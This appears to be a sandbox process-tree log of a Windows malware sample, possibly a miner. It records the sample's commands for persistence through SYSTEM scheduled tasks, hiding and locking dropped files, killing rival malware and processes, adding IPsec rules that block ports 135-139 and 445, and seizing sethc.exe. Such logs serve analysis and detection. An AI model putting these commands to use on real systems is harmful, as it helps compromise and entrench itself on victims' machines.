  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r | PID:6112
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:6132
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r | PID:6140
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5232
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE | PID:5160
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y" | PID:5912
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service" | PID:5904
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5916
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system | PID:5924
  [3] C:\Windows\SysWOW64\net.exe | net user mm123$ /del | PID:5976
    [4] C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 user mm123$ /del | PID:5988
  [3] C:\Windows\SysWOW64\net1.exe | net1 user mm123$ /del | PID:6028
  [3] C:\Windows\SysWOW64\net.exe | net user mm123$ /del | PID:6072
    [4] C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 user mm123$ /del | PID:6100
  [3] C:\Windows\SysWOW64\net1.exe | net1 user mm123$ /del | PID:6128
  [3] C:\Windows\SysWOW64\net.exe | net user mm123$ /del | PID:2888
    [4] C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 user mm123$ /del | PID:5228
  [3] C:\Windows\SysWOW64\net1.exe | net1 user mm123$ /del | PID:5908
  [3] C:\Windows\SysWOW64\sc.exe | sc config Schedule start= auto | PID:5932
  [3] C:\Windows\SysWOW64\sc.exe | sc start Schedule | PID:2212 | Launches sc.exe
  [3] C:\Windows\SysWOW64\schtasks.exe | schtasks /delete /tn AutoKMSK /f | PID:5920
  [3] C:\Windows\SysWOW64\schtasks.exe | schtasks /delete /tn "Adobe Flash Player Updaters" /f | PID:5948
  [3] C:\Windows\SysWOW64\schtasks.exe | schtasks /create /sc minute /mo 15 /tn "AutoKMSK" /tr "C:\windows\Installer\conhost.exe" /ru "system" /f | PID:4732 | Creates scheduled task(s)
  [3] C:\Windows\SysWOW64\schtasks.exe | schtasks /run /tn "AutoKMSK" | PID:5464
  [3] C:\Windows\SysWOW64\schtasks.exe | schtasks /create /sc minute /mo 35 /tn "AutoKMSKK" /tr "C:\windows\Installer\free.bat" /ru "system" /f | PID:5444 | Creates scheduled task(s)
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\system32\Drivers\etc\hosts /a | PID:5424 | Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5416
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\Drivers\etc\hosts /g users:f | PID:5408
  [3] C:\Windows\SysWOW64\attrib.exe | attrib -s -h -a -r C:\Windows\system32\Drivers\etc\hosts | PID:5388 | Views/modifies file attributes
  [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +a +r C:\Windows\system32\Drivers\etc\hosts | PID:5360 | Sets file to hidden; Views/modifies file attributes
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5340
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\Drivers\etc\hosts /d everyone | PID:5332
  [3] C:\Windows\SysWOW64\ipconfig.exe | ipconfig /flushdns | PID:5316 | Gathers network information
  [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r C:\Windows\splwow64.exe | PID:5304 | Sets file to hidden; Drops file in Windows directory; Views/modifies file attributes
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5288
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\splwow64.exe /d everyone | PID:5280
  [3] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im splwow64.exe | PID:5268 | Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r C:\Windows\svchost.exe | PID:5884 | Sets file to hidden; Drops file in Windows directory; Views/modifies file attributes
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5876
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\svchost.exe /d everyone | PID:5868
  [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\svchost.exe'" call Terminate | PID:5856 | Kills process with WMI; Suspicious use of AdjustPrivilegeToken
  [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r C:\Windows\Fonts\Mysql | PID:5680 | Sets file to hidden; Drops file in Windows directory; Views/modifies file attributes
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5708
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\Fonts\Mysql /d everyone | PID:5716
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\System32\Magnify.exe /a | PID:5732 | Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5744
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\System32\Magnify.exe /d everyone | PID:5752
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\system32\sleep.exe /a | PID:5764 | Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5800
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\sleep.exe /d everyone | PID:5808
  [3] C:\Windows\SysWOW64\schtasks.exe | schtasks /delete /tn "At1" /f | PID:5824
  [3] C:\Windows\SysWOW64\schtasks.exe | schtasks /delete /tn "At2" /f | PID:5236
  [3] C:\Windows\SysWOW64\schtasks.exe | schtasks /delete /tn "\Microsoft\Windows\UPnP\Services" /f | PID:3800
  [3] C:\Windows\SysWOW64\sc.exe | sc stop EndpointRpc | PID:6116 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc delete EndpointRpc | PID:6096 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc stop HEU_KMS_Renewal | PID:6132
  [3] C:\Windows\SysWOW64\sc.exe | sc delete HEU_KMS_Renewal | PID:5904 | Launches sc.exe
  [3] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im lsaus.exe | PID:6080 | Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r C:\Windows\system\lsaus.exe | PID:3820 | Sets file to hidden; Drops file in Windows directory; Views/modifies file attributes
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:3816
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system\lsaus.exe /d everyone | PID:5848
  [3] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im lsmos.exe | PID:5856 | Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r C:\Windows\debug\lsmos.exe | PID:5720 | Sets file to hidden; Drops file in Windows directory; Views/modifies file attributes
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5736
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\debug\lsmos.exe /d everyone | PID:5732
  [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r C:\Windows\Temp\conhost.exe | PID:5384 | Sets file to hidden; Views/modifies file attributes
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5404
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\Temp\conhost.exe /d everyone | PID:5412
  [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\Temp\\conhost.exe'" call Terminate | PID:2088 | Kills process with WMI; Suspicious use of AdjustPrivilegeToken
  [3] C:\Windows\SysWOW64\sc.exe | sc stop xWinWpdSrv | PID:5480 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc delete xWinWpdSrv | PID:4752
  [3] C:\Windows\SysWOW64\sc.exe | sc stop SQLService | PID:4744
  [3] C:\Windows\SysWOW64\sc.exe | sc delete SQLService | PID:4724 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc stop update | PID:4968
  [3] C:\Windows\SysWOW64\sc.exe | sc delete update | PID:4956 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc stop Microsoft_Update | PID:4940
  [3] C:\Windows\SysWOW64\sc.exe | sc delete Microsoft_Update | PID:4932 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc stop Samserver | PID:4916 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc delete Samserver | PID:4904
  [3] C:\Windows\SysWOW64\sc.exe | sc stop RpcEptManger | PID:4892 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc delete RpcEptManger | PID:4872
  [3] C:\Windows\SysWOW64\sc.exe | sc stop MicrosoftFonts | PID:4860 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc delete MicrosoftFonts | PID:4844
  [3] C:\Windows\SysWOW64\sc.exe | sc stop WinVMDHCPI | PID:4832 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc delete WinVMDHCPI | PID:5152 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc stop wmiApServs | PID:5132 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc delete wmiApServs | PID:4232 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc stop "Windows TrustedInstaller" | PID:3580 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc delete "Windows TrustedInstaller" | PID:3872 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc stop COMSysCts | PID:5492
  [3] C:\Windows\SysWOW64\sc.exe | sc delete COMSysCts | PID:5488 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc stop SuperProServer | PID:616
  [3] C:\Windows\SysWOW64\sc.exe | sc delete SuperProServer | PID:5472 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc stop WindosroServert | PID:4756
  [3] C:\Windows\SysWOW64\sc.exe | sc delete WindosroServert | PID:4740
  [3] C:\Windows\SysWOW64\sc.exe | sc stop wmiApSrvs | PID:4720 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc delete wmiApSrvs | PID:4960
  [3] C:\Windows\SysWOW64\sc.exe | sc stop Abrjkb Dumne | PID:4944 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc delete Abrjkb Dumne | PID:4936
  [3] C:\Windows\SysWOW64\sc.exe | sc stop Defghiback | PID:4924 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc delete Defghiback | PID:5772
  [3] C:\Windows\SysWOW64\sc.exe | sc stop RpcEpt | PID:5744
  [3] C:\Windows\SysWOW64\sc.exe | sc delete RpcEpt | PID:5708 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc stop MicrosoftMysql | PID:3808 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc delete MicrosoftMysql | PID:3820 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc stop MicrosoftMssql | PID:4924
  [3] C:\Windows\SysWOW64\sc.exe | sc delete MicrosoftMssql | PID:5356 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc stop WmiAppSrv | PID:5372 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc delete WmiAppSrv | PID:5340 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc stop WmiAppSvr | PID:5600
  [3] C:\Windows\SysWOW64\sc.exe | sc delete WmiAppSvr | PID:5612
  [3] C:\Windows\SysWOW64\sc.exe | sc stop Framework | PID:5624 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc delete Framework | PID:5640
  [3] C:\Windows\SysWOW64\sc.exe | sc stop clr_optimization_v4.0.30318_64 | PID:3852
  [3] C:\Windows\SysWOW64\sc.exe | sc delete clr_optimization_v4.0.30318_64 | PID:3868
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:3892
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Windows\tasksche.exe" /d everyone | PID:3896
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:3908
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\WmiAppSrv\svchost.exe" /d everyone | PID:3916
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:3936
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\WmiAppSvr\svchost.exe" /d everyone | PID:3944
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:3960
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\WmiApprsv\svchost.exe" /d everyone | PID:4764
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:4780
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\WmiAppSrv\csrss.exe" /d everyone | PID:4784
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:4800
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\WmiAppSrv\csrss.exe" /d everyone | PID:4812
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:4824
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\WmiAppSvr\csrss.exe" /d everyone | PID:4356
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:4364
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\WmiApprsv\csrss.exe" /d everyone | PID:4376
  [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='svchost.exe' and ExecutablePath='C:\\programdata\\wmiappsrv\\svchost.exe'" call Terminate | PID:5176 | Kills process with WMI
  [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSvr\\svchost.exe'" call Terminate | PID:3580 | Kills process with WMI
  [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='svchost.exe' and ExecutablePath='C:\\programdata\\wmiapprsv\\svchost.exe'" call Terminate | PID:5252 | Kills process with WMI
  [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSvr\\csrss.exe'" call Terminate | PID:4032 | Kills process with WMI
  [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='csrss.exe' and ExecutablePath='C:\\programdata\\wmiapprsv\\csrss.exe'" call Terminate | PID:3992 | Kills process with WMI
  [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSrv\\csrss.exe'" call Terminate | PID:3548 | Kills process with WMI
  [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe'" call Terminate | PID:3516 | Kills process with WMI
  [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppSvr\\csrss.exe'" call Terminate | PID:5404 | Kills process with WMI
  [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppRsv\\csrss.exe'" call Terminate | PID:4828 | Kills process with WMI
  [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='tasksche.exe' and ExecutablePath='C:\\Windows\\tasksche.exe'" call Terminate | PID:5952 | Kills process with WMI
  [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r "C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe" | PID:5372 | Sets file to hidden; Views/modifies file attributes
  [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r "C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe" | PID:4988 | Sets file to hidden; Views/modifies file attributes
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:4996
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe" /d everyone | PID:5004
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5012
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe" /d everyone | PID:5024
  [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\clr_optimization_v4.0.30318_64\\svchost.exe'" call Terminate | PID:5044 | Kills process with WMI
  [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\clr_optimization_v4.0.30318_64\\csrss.exe'" call Terminate | PID:5068 | Kills process with WMI
  [3] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im boy.exe | PID:3548 | Kills process with taskkill
  [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r C:\Windows\boy.exe | PID:4900 | Sets file to hidden; Drops file in Windows directory; Views/modifies file attributes
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:4916
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\boy.exe /d everyone | PID:4952
  [3] C:\Windows\SysWOW64\sc.exe | sc start PolicyAgent | PID:5152 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc config PolicyAgent start= AUTO | PID:4836 | Launches sc.exe
  [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static del all | PID:5516
  [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add policy name=Aliyun | PID:3944
  [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filterlist name=Allowlist | PID:900
  [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filterlist name=denylist | PID:1796
  [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135 | PID:1252
  [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137 | PID:4684
  [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138 | PID:4648
  [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139 | PID:1492
  [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445 | PID:5564
  [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filteraction name=Allow action=permit | PID:5200
  [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filteraction name=deny action=block | PID:4028
  [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny | PID:5544
  [3] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static set policy name=Aliyun assign=y | PID:3592
  [3] C:\Windows\SysWOW64\schtasks.exe | schtasks /delete /tn "NETControlUpdate" /f | PID:3524
  [3] C:\Windows\SysWOW64\schtasks.exe | schtasks /delete /tn "WinHostStartForMachine" /f | PID:4776
  [3] C:\Windows\SysWOW64\schtasks.exe | schtasks /delete /tn "MicrosoftUpdate" /f | PID:4564
  [3] C:\Windows\SysWOW64\schtasks.exe | schtasks /delete /tn "AdobeFlashPlayer" /f | PID:4592
  [3] C:\Windows\SysWOW64\schtasks.exe | schtasks /delete /tn "Adobe Flash Player Updaters" /f | PID:3908
  [3] C:\Windows\SysWOW64\schtasks.exe | schtasks /delete /tn "Font upgrade service" /f | PID:3368
  [3] C:\Windows\SysWOW64\sc.exe | sc stop FastUserSwitchingCompatibility | PID:3384 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc delete FastUserSwitchingCompatibility | PID:3408
  [3] C:\Windows\SysWOW64\sc.exe | sc stop PSEXESVC | PID:3420 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc delete PSEXESVC | PID:3432 | Launches sc.exe
  [3] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im rundll32.exe | PID:3444 | Kills process with taskkill
  [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r +a C:\Windows\SpeechsTracing | PID:4048 | Sets file to hidden; Drops file in Windows directory; Views/modifies file attributes
  [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='spoolsv.exe' and ExecutablePath='C:\\Windows\\SpeechsTracing\\spoolsv.exe'" call Terminate | PID:5508 | Kills process with WMI
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:3084
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\SpeechsTracing\spoolsv.exe /d everyone | PID:3940
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:4644
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\SpeechsTracing /t /d everyone | PID:900
  [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\SecureBootThemes\\Microsoft\\svchost.exe'" call Terminate | PID:4624 | Kills process with WMI
  [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\sysprepthemes\\microsoft\\svchost.exe'" call Terminate | PID:1896 | Kills process with WMI
  [3] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\SpeechsTracing\\Microsoft\\svchost.exe'" call Terminate | PID:3484 | Kills process with WMI
  [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r +a C:\Windows\SecureBootThemes | PID:5104 | Sets file to hidden; Drops file in Windows directory; Views/modifies file attributes
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5080
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\SecureBootThemes /p everyone:n /d system | PID:4672
  [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r +a C:\Windows\System32\wmassrv.dll | PID:3500 | Sets file to hidden; Drops file in System32 directory; Views/modifies file attributes
  [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r +a C:\Windows\System32\HalPluginsServices.dll | PID:3532 | Sets file to hidden; Drops file in System32 directory; Views/modifies file attributes
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:4896
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\System32\wmassrv.dll /d everyone | PID:4452
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:2832
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\System32\HalPluginsServices.dll /d everyone | PID:1260
  [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r +a C:\Windows\sysprepthemes | PID:5928 | Sets file to hidden; Drops file in Windows directory; Views/modifies file attributes
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:4556
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\sysprepthemes /d everyone | PID:4548
  [3] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im WScript.exe /im *.tmp /im *.jpg /im *.cc3 | PID:4516 | Kills process with taskkill
  [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r "C:\program files (x86)\exfg" | PID:2932 | Sets file to hidden; Drops file in Program Files directory; Views/modifies file attributes
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:1432
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\program files (x86)\exfg" /d everyone | PID:5588
  [3] C:\Windows\SysWOW64\sc.exe | sc stop "Amxend Msbtvsqv Ble" | PID:5376 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc delete "Amxend Msbtvsqv Ble" | PID:3352
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:3936
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\programdata\application data\storm\update" /g users:r | PID:4572
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\SysWOW64\*.cc3 /a | PID:5520 | Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:4088
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Windows\SysWOW64\*.cc3" /t /p everyone:n | PID:4000
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:3372
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\programdata\application data\storm\update\*.cc3" /t /p everyone:n | PID:3356
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:3900
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\programdata\application data\storm\update\*.tmp" /t /p everyone:n | PID:3092
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:3836
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\programdata\application data\storm\update\*.jpg" /t /p everyone:n | PID:4088
  [3] C:\Windows\SysWOW64\sc.exe | sc stop bddlsvc | PID:4000
  [3] C:\Windows\SysWOW64\sc.exe | sc delete bddlsvc | PID:1128 | Launches sc.exe
  [3] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im crawler.exe /im Crowdtest.exe /im CrowdtestWatcher.exe /im Kerrigan.exe /im adb.exe /im phantomjs.exe | PID:1704 | Kills process with taskkill
  [3] C:\Windows\SysWOW64\reg.exe | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CrowdtestWatcher.exe" /v "debugger" /d taskkill.exe /f | PID:3460 | Sets file execution options in registry
  [3] C:\Windows\SysWOW64\schtasks.exe | schtasks /end /tn "Securitycript" | PID:3472
  [3] C:\Windows\SysWOW64\schtasks.exe | schtasks /delete /tn Securitycript /f | PID:3908
  [3] C:\Windows\SysWOW64\schtasks.exe | schtasks /delete /tn GooglePinginConfigs /f | PID:3468
  [3] C:\Windows\SysWOW64\schtasks.exe | schtasks /delete /tn RavTask /f | PID:3396
  [3] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im Setting.exe | PID:5192 | Kills process with taskkill
  [3] C:\Windows\SysWOW64\attrib.exe | attrib +s +h +r "C:\Program Files (x86)\Microsoft MSBuild\Setting.exe" | PID:4536 | Sets file to hidden; Views/modifies file attributes
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:1228
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Microsoft MSBuild\Setting.exe" /d everyone | PID:1552
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Microsoft MSBuild\Setting.exe" /p everyone:n /d system | PID:760
[2] C:\Windows\SysWOW64\cmd.exe | cmd /c c:\windows\inf\temp1.bat | PID:2492
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\system32\sethc.exe /a | PID:2440 | Modifies file permissions; Suspicious use of AdjustPrivilegeToken
